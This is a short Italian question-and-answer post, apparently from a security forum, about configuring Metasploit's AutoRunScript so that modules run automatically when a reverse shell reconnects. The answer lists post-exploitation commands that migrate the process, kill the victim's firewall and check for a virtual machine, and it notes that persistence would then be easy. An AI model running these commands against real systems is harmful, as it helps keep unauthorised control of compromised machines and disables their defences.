È possibile kickare automaticamente uno script Metasploit quando una connessione TCP Reverse Shell si ricollega al gestore?
es. Reverse-Shell si connette di nuovo, avvia automaticamente uno script che renderà persistente la connessione.
Sì. Puoi farlo usando la funzione AutoRunScript.
set AutoRunScript multi_console_command -rc /root/commands.rc
Dove /root/commands.rc contiene i comandi con cui eseguire.
Ad esempio
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
Da questo punto sarebbe banale ottenere la persistenza.
Per ulteriori informazioni, consulta queste risorse:
Esecuzione automatica dei moduli Metasploit su ricezione di shell?
Leggi altre domande sui tag metasploit